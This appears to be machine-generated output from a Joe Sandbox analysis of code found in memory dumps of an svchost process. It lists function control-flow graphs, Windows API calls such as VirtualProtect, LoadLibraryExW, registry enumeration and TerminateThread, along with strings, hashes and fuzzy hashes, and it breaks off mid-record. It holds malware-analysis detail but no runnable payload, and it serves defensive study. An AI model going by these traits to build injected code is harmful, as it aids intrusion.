                                                        control_flow_graph 453 14e255d9944-14e255d99ac call 14e255da814 456 14e255d9e13-14e255d9e1b call 14e255dbb48 453->456 457 14e255d99b2-14e255d99b5 453->457 457->456 459 14e255d99bb-14e255d99c1 457->459 460 14e255d99c7-14e255d99cb 459->460 461 14e255d9a90-14e255d9aa2 459->461 460->461 465 14e255d99d1-14e255d99dc 460->465 463 14e255d9aa8-14e255d9aac 461->463 464 14e255d9d63-14e255d9d67 461->464 463->464 466 14e255d9ab2-14e255d9abd 463->466 468 14e255d9d69-14e255d9d70 464->468 469 14e255d9da0-14e255d9daa call 14e255d8a34 464->469 465->461 467 14e255d99e2-14e255d99e7 465->467 466->464 470 14e255d9ac3-14e255d9aca 466->470 467->461 471 14e255d99ed-14e255d99f7 call 14e255d8a34 467->471 468->456 472 14e255d9d76-14e255d9d9b call 14e255d9e1c 468->472 469->456 482 14e255d9dac-14e255d9dcb call 14e255d6d40 469->482 474 14e255d9c94-14e255d9ca0 470->474 475 14e255d9ad0-14e255d9b07 call 14e255d8e10 470->475 471->482 486 14e255d99fd-14e255d9a28 call 14e255d8a34 * 2 call 14e255d9124 471->486 472->469 474->469 479 14e255d9ca6-14e255d9caa 474->479 475->474 490 14e255d9b0d-14e255d9b15 475->490 483 14e255d9cba-14e255d9cc2 479->483 484 14e255d9cac-14e255d9cb8 call 14e255d90e4 479->484 483->469 489 14e255d9cc8-14e255d9cd5 call 14e255d8cb4 483->489 484->483 497 14e255d9cdb-14e255d9ce3 484->497 521 14e255d9a2a-14e255d9a2e 486->521 522 14e255d9a48-14e255d9a52 call 14e255d8a34 486->522 489->469 489->497 495 14e255d9b19-14e255d9b4b 490->495 499 14e255d9c87-14e255d9c8e 495->499 500 14e255d9b51-14e255d9b5c 495->500 502 14e255d9df6-14e255d9e12 call 14e255d8a34 * 2 call 14e255dbaa8 497->502 503 14e255d9ce9-14e255d9ced 497->503 499->474 499->495 500->499 504 14e255d9b62-14e255d9b7b 500->504 502->456 506 14e255d9cef-14e255d9cfe call 14e255d90e4 503->506 507 14e255d9d00 503->507 508 14e255d9c74-14e255d9c79 504->508 509 14e255d9b81-14e255d9bc6 call 14e255d90f8 * 2 504->509 517 14e255d9d03-14e255d9d0d call 14e255da8ac 506->517 507->517 513 14e255d9c84 508->513 537 14e255d9bc8-14e255d9bee call 14e255d90f8 call 14e255da038 509->537 538 14e255d9c04-14e255d9c0a 509->538 513->499 517->469 529 14e255d9d13-14e255d9d61 call 14e255d8d44 call 14e255d8f50 517->529 521->522 528 14e255d9a30-14e255d9a3b 521->528 522->461 536 14e255d9a54-14e255d9a74 call 14e255d8a34 * 2 call 14e255da8ac 522->536 528->522 533 14e255d9a3d-14e255d9a42 528->533 529->469 533->456 533->522 559 14e255d9a8b 536->559 560 14e255d9a76-14e255d9a80 call 14e255da99c 536->560 553 14e255d9c15-14e255d9c72 call 14e255d9870 537->553 554 14e255d9bf0-14e255d9c02 537->554 542 14e255d9c7b 538->542 543 14e255d9c0c-14e255d9c10 538->543 547 14e255d9c80 542->547 543->509 547->513 553->547 554->537 554->538 559->461 563 14e255d9a86-14e255d9def call 14e255d86ac call 14e255da3f4 call 14e255d88a0 560->563 564 14e255d9df0-14e255d9df5 call 14e255dbaa8 560->564 563->564 564->502
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2797194674.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: b2a34a7c217fcdebc7505ea3e7ea67a3eaa2ec335367fa87b754eea6f7af43be
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: CDE1E573A46B4286EB60DF65DA80BDD77F8F756B98F000115EE4A57BA9CB78C091C700
                                                        Function 0000014E25EDA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 574 14e25eda544-14e25eda5ac call 14e25edb414 577 14e25edaa13-14e25edaa1b call 14e25edc748 574->577 578 14e25eda5b2-14e25eda5b5 574->578 578->577 579 14e25eda5bb-14e25eda5c1 578->579 581 14e25eda5c7-14e25eda5cb 579->581 582 14e25eda690-14e25eda6a2 579->582 581->582 586 14e25eda5d1-14e25eda5dc 581->586 584 14e25eda6a8-14e25eda6ac 582->584 585 14e25eda963-14e25eda967 582->585 584->585 587 14e25eda6b2-14e25eda6bd 584->587 589 14e25eda969-14e25eda970 585->589 590 14e25eda9a0-14e25eda9aa call 14e25ed9634 585->590 586->582 588 14e25eda5e2-14e25eda5e7 586->588 587->585 591 14e25eda6c3-14e25eda6ca 587->591 588->582 592 14e25eda5ed-14e25eda5f7 call 14e25ed9634 588->592 589->577 593 14e25eda976-14e25eda99b call 14e25edaa1c 589->593 590->577 600 14e25eda9ac-14e25eda9cb call 14e25ed7940 590->600 595 14e25eda894-14e25eda8a0 591->595 596 14e25eda6d0-14e25eda707 call 14e25ed9a10 591->596 592->600 608 14e25eda5fd-14e25eda628 call 14e25ed9634 * 2 call 14e25ed9d24 592->608 593->590 595->590 601 14e25eda8a6-14e25eda8aa 595->601 596->595 612 14e25eda70d-14e25eda715 596->612 605 14e25eda8ba-14e25eda8c2 601->605 606 14e25eda8ac-14e25eda8b8 call 14e25ed9ce4 601->606 605->590 611 14e25eda8c8-14e25eda8d5 call 14e25ed98b4 605->611 606->605 618 14e25eda8db-14e25eda8e3 606->618 640 14e25eda62a-14e25eda62e 608->640 641 14e25eda648-14e25eda652 call 14e25ed9634 608->641 611->590 611->618 616 14e25eda719-14e25eda74b 612->616 620 14e25eda887-14e25eda88e 616->620 621 14e25eda751-14e25eda75c 616->621 623 14e25eda9f6-14e25edaa12 call 14e25ed9634 * 2 call 14e25edc6a8 618->623 624 14e25eda8e9-14e25eda8ed 618->624 620->595 620->616 621->620 625 14e25eda762-14e25eda77b 621->625 623->577 627 14e25eda8ef-14e25eda8fe call 14e25ed9ce4 624->627 628 14e25eda900 624->628 629 14e25eda874-14e25eda879 625->629 630 14e25eda781-14e25eda7c6 call 14e25ed9cf8 * 2 625->630 633 14e25eda903-14e25eda90d call 14e25edb4ac 627->633 628->633 635 14e25eda884 629->635 655 14e25eda7c8-14e25eda7ee call 14e25ed9cf8 call 14e25edac38 630->655 656 14e25eda804-14e25eda80a 630->656 633->590 653 14e25eda913-14e25eda961 call 14e25ed9944 call 14e25ed9b50 633->653 635->620 640->641 647 14e25eda630-14e25eda63b 640->647 641->582 659 14e25eda654-14e25eda674 call 14e25ed9634 * 2 call 14e25edb4ac 641->659 647->641 652 14e25eda63d-14e25eda642 647->652 652->577 652->641 653->590 674 14e25eda815-14e25eda872 call 14e25eda470 655->674 675 14e25eda7f0-14e25eda802 655->675 663 14e25eda87b 656->663 664 14e25eda80c-14e25eda810 656->664 680 14e25eda68b 659->680 681 14e25eda676-14e25eda680 call 14e25edb59c 659->681 668 14e25eda880 663->668 664->630 668->635 674->668 675->655 675->656 680->582 684 14e25eda686-14e25eda9ef call 14e25ed92ac call 14e25edaff4 call 14e25ed94a0 681->684 685 14e25eda9f0-14e25eda9f5 call 14e25edc6a8 681->685 684->685 685->623
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: dc5baa9e4900bccee7b18694ed6ad8fc180f2675819547d15587c8c5e04f39b1
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 7FE1D472606B408AEBA0DF65DE40BDD77ECF756B98F102115EE8A57BA9CB78C181C700
                                                        Function 0000014E25EDF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 695 14e25edf394-14e25edf3e6 696 14e25edf3ec-14e25edf3ef 695->696 697 14e25edf4d7 695->697 698 14e25edf3f9-14e25edf3fc 696->698 699 14e25edf3f1-14e25edf3f4 696->699 700 14e25edf4d9-14e25edf4f5 697->700 701 14e25edf4bc-14e25edf4cf 698->701 702 14e25edf402-14e25edf411 698->702 699->700 701->697 703 14e25edf413-14e25edf416 702->703 704 14e25edf421-14e25edf440 LoadLibraryExW 702->704 705 14e25edf41c 703->705 706 14e25edf516-14e25edf525 GetProcAddress 703->706 707 14e25edf4f6-14e25edf50b 704->707 708 14e25edf446-14e25edf44f GetLastError 704->708 709 14e25edf4a8-14e25edf4af 705->709 711 14e25edf527-14e25edf54e 706->711 712 14e25edf4b5 706->712 707->706 710 14e25edf50d-14e25edf510 FreeLibrary 707->710 713 14e25edf496-14e25edf4a0 708->713 714 14e25edf451-14e25edf468 call 14e25edc928 708->714 709->702 709->712 710->706 711->700 712->701 713->709 714->713 717 14e25edf46a-14e25edf47e call 14e25edc928 714->717 717->713 720 14e25edf480-14e25edf494 LoadLibraryExW 717->720 720->707 720->713
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 22fee92a7b634e20b8207f9d96fbe19373ab9512f5f1e434ffbaebbadbf46c39
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: BA41C432322A1051EA96CF16AE00FE923DDBB46BE0F196129DD1F877A5EEB8C4458301
                                                        Function 0000014E25ED104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 721 14e25ed104c-14e25ed10b9 RegQueryInfoKeyW 722 14e25ed11b5-14e25ed11d0 721->722 723 14e25ed10bf-14e25ed10c9 721->723 723->722 724 14e25ed10cf-14e25ed111f RegEnumValueW 723->724 725 14e25ed11a5-14e25ed11af 724->725 726 14e25ed1125-14e25ed112a 724->726 725->722 725->724 726->725 727 14e25ed112c-14e25ed1135 726->727 728 14e25ed1147-14e25ed114c 727->728 729 14e25ed1137 727->729 731 14e25ed1199-14e25ed11a3 728->731 732 14e25ed114e-14e25ed1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 728->732 730 14e25ed113b-14e25ed113f 729->730 730->725 733 14e25ed1141-14e25ed1145 730->733 731->725 732->731 733->728 733->730
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: d53801182b1a1fddabf9b2cb97fa914ecb6b5c17acb5066caa3a10faa4a8568e
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: DE418073214B84C6E7A4CF21E94479E77E9F389B98F148129DB8A07B68DF78C549CB00
                                                        Function 0000014E25EDD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD087
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 67d499ed1cae324e52016772c9b3e2eb920b02c753671c71406fddec84103b65
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 0511633070664441FAE89B359F51BED62CEBB877F0F546324983B066FADEE9C8028301
                                                        Function 0000014E25ED7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: eec92c873ab8a8532cd6d95de1f2b50f3b3f0ee532591f7514190b140d4d18b8
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 20811E71A1224186FBD0AB25AE43FD922DDBB87780F146425AA4B437F7EBF9C841C700
                                                        Function 0000014E25ED9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 4b673a47d5b222b7fe4c6400c13b60ea41fad0e13ee299185a4e4a279635b7ed
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 4731C731313640E1EEA2DB42AE00FE962DCB759BB0F5916259D1F8B3B5EFB9C5458300
                                                        Function 0000014E25EE3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: dac870ae50dc774142f57e224bcde91fef96868b3a026d0ca4bce480cb7abb85
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: D6115E31220B4086E7A18B52F944B5976E8F788FF4F144214EA5F877B5DFB8C5148740
                                                        Function 0000014E25ED3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 2d2ae68968ed466a8bd9f8edaa945d4ff509ed3e6404d4b55c90d98096d8e2c2
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 58118E7A321B4082EF949B11F904AA9B3E8F789B94F140028DE8A037A5EF7DC505C704
                                                        Function 0000014E25ED5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: dbf7c04510264e3aa80be77e2b965e56a4bbf761f2bbcec70d3958daf628b150
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: 9AD1BA76219B8881DAB09B06E99079A77E8F3C9B84F101116EACE47BB5DF7CC551CB00
                                                        Function 0000014E25ED2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 84f0a49ae497355131a2aac26c953b08be1bccc37f8d4e7dda7159b87278197d
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 5B31C732712B6183EB95CF16EE40BA9A7DDFB45B90F0854249E4A47B76EF75C461C300
                                                        Function 0000014E25EDCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 471d6bd78421e7f0d323d5dd982a26040bfcc08c4fbacc160c0418542b83e496
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: 05115E3020224481FAE99B219F45BED61CEBB877F0F146724A837467F6DEE988019341
                                                        Function 0000014E25ED199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: ca7a516169cdbcbbb0f1702b00ec33b0ff134d6781b8bdceb78e20af0a0e2d48
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 5F016971710B4082EBA4DB52B948B9963E9F788BD4F984035DE4E43766DF7CC989C700
                                                        Function 0000014E25ED36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: cd6817a2b86cb7a5d2c6d38da5d770d31958944fdfcb510b49edaf7ad4408b8a
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: C6012DB5222B4082FFA59B21FD08B9A73E8BB49B96F140528CD4A07775EFBDC1088700
                                                        Function 0000014E25ED9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 9b2a1657cc1f5397dbb91559528021781e071057780ce7782a4c857206022f56
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 2751BD327126018AEB94DF15EE48F9837DEF366B98F129524DA47877ACEBB5C841C700
                                                        Function 0000014E25ED8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: d85250e2fd4da4f793b085a3e5f2ae8afe95a5ea4a6e7ad585896a302fadfb02
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: C431CB3221274086E790DF11ED08B9937ECF356B98F168414EE8B837A9CBB9C940C700
                                                        Function 0000014E25ED1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: eb17f0113111d357bb3c0c2e1e39b944648b27065071a28b27f10ee0fb883d04
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 6EF0A47271064082EBB08F20FA84B9963A8F74CBA8F944020CA4A46A65DFBCC64DCB00
                                                        Function 0000014E25EDBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: ae1ffe23413f3f9ac290ddb9a375ecfb0d94467b0eec39550c61245b0545be19
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: FAF0F6B132270581EF508F24F944B9923ACFB89770F601219CA6B051F4DFBCC044C700
                                                        Function 0000014E25ED3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000028.00000002.2798052340.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction ID: a8a97001e52402dc951ae60ecd85aaaa03d7a8c3e915bbc4e21f66f82a1337c1
